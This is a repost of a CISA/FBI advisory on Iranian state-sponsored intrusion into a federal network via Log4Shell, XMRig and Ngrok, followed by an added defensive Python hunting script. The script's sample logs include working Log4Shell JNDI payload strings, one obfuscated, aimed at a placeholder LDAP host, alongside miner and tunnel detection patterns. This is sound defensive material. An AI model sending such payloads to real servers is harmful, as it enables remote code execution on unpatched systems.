
Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester

From mid-June to mid-July 2022, CISA conducted an incident response engagement at a Federal Civilian Executive Branch (FCEB) organization where CISA observed suspected advanced persistent threat (APT) activity. During the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto-mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on multiple hosts to maintain persistence. CISA and the Federal Bureau of Investigation (FBI) assess that the FCEB network was compromised by Iranian government-sponsored APT actors.

CISA and FBI are releasing this Cybersecurity Advisory (CSA) to provide the suspected Iranian government-sponsored actors' tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help network defenders detect and protect against related compromises.

CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities. If suspected initial access or compromise is detected based on the IOCs or TTPs described in this CSA, CISA and FBI encourage organizations to assume lateral movement by the threat actors, investigate connected systems (including the DC), and audit privileged accounts. All organizations, regardless of identified evidence of compromise, should apply the recommendations in the Mitigations section of this CSA to protect against similar malicious cyber activity.
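The advisory asks defenders to hunt for the three stages it describes: Log4Shell exploitation attempts against the Horizon server, XMRig running on compromised hosts, and Ngrok tunnels on hosts including the DC. The script below is an added illustration of such a hunt and is not code from the advisory, CISA, or the original post. It scans constructed web-server log lines for JNDI lookup strings (including the nested-lookup obfuscation commonly seen in the wild) and a constructed process inventory for miner and tunnel command lines; all host names, addresses, file paths, and the `pool.example` string are placeholders, and the `--donate-level`/`--coin` flags and `stratum+tcp` scheme are ordinary XMRig/mining indicators rather than anything specific to this intrusion.

```python
import re
from typing import Dict, List

# --- Constructed sample data (not advisory IOCs) -----------------------------
# Two access-log lines carry a JNDI lookup in the User-Agent header; the
# second uses nested ${lower:..}/${::-..} lookups to evade naive matching.
SAMPLE_ACCESS_LOG = [
    '198.51.100.7 - - [20/Jun/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.7 - - [20/Jun/2022:10:01:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://203.0.113.5:1389/b}"',
    '192.0.2.44 - - [20/Jun/2022:10:02:00 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# Constructed process inventory, e.g. an EDR export. Host names and paths are placeholders.
SAMPLE_PROCESSES = [
    {"host": "horizon01", "pid": 4120, "cmdline": r"C:\Windows\Temp\svc.exe -o pool.example:3333 --donate-level 1"},
    {"host": "dc01", "pid": 2217, "cmdline": r"C:\ProgramData\ngrok.exe tcp 3389"},
    {"host": "ws07", "pid": 880, "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

# --- Detection logic ----------------------------------------------------------
# Innermost lookups that only transform a literal: ${lower:x}, ${upper:x}, ${::-x}.
# For detection we simply unwrap them to x (case handled by IGNORECASE later).
_NESTED = re.compile(r"\$\{(?:lower|upper):([^}]*)\}|\$\{::-([^}]*)\}", re.IGNORECASE)
# A resolved JNDI lookup with a URL scheme, e.g. ${jndi:ldap://host/path}.
_JNDI = re.compile(r"\$\{jndi:[a-z]+://[^}\s]*", re.IGNORECASE)
# XMRig binary name / flags and the stratum mining scheme.
_MINER = re.compile(r"xmrig|--donate-level|--coin\b|stratum\+tcp", re.IGNORECASE)
# Ngrok client binary.
_TUNNEL = re.compile(r"\bngrok(\.exe)?\b", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Repeatedly unwrap nested transform lookups until the string is stable."""
    prev = None
    while prev != text:
        prev = text
        text = _NESTED.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
    return text


def find_log4shell_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """Return log lines containing a (possibly obfuscated) JNDI lookup."""
    hits = []
    for line in lines:
        match = _JNDI.search(normalize_lookups(line))
        if match:
            hits.append({"line": line, "normalized": match.group(0)})
    return hits


def classify_processes(procs: List[Dict]) -> List[Dict]:
    """Flag processes whose command line looks like a miner or an Ngrok tunnel."""
    findings = []
    for proc in procs:
        cmd = proc["cmdline"]
        if _MINER.search(cmd):
            findings.append({"host": proc["host"], "pid": proc["pid"], "category": "crypto-miner"})
        if _TUNNEL.search(cmd):
            findings.append({"host": proc["host"], "pid": proc["pid"], "category": "reverse-proxy"})
    return findings


def hunt(lines: List[str], procs: List[Dict]) -> Dict[str, object]:
    """Combine both checks and list the hosts that now warrant investigation."""
    findings = classify_processes(procs)
    return {
        "log4shell_attempts": find_log4shell_attempts(lines),
        "process_findings": findings,
        "hosts_to_investigate": sorted({f["host"] for f in findings}),
    }


if __name__ == "__main__":
    result = hunt(SAMPLE_ACCESS_LOG, SAMPLE_PROCESSES)
    for hit in result["log4shell_attempts"]:
        print("JNDI lookup:", hit["normalized"])
    for finding in result["process_findings"]:
        print("Process:", finding)
    print("Investigate:", result["hosts_to_investigate"])
```

A hit on the DC in the process findings is exactly the case the advisory singles out: treat it as confirmed lateral movement and move on to the privileged-account audit rather than cleaning the single host.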

For more information on Iranian government-sponsored malicious cyber activity, see CISA's Iran Cyber Threat Overview and Advisories webpage and FBI's Iran Threats webpage.

Read more at CISA
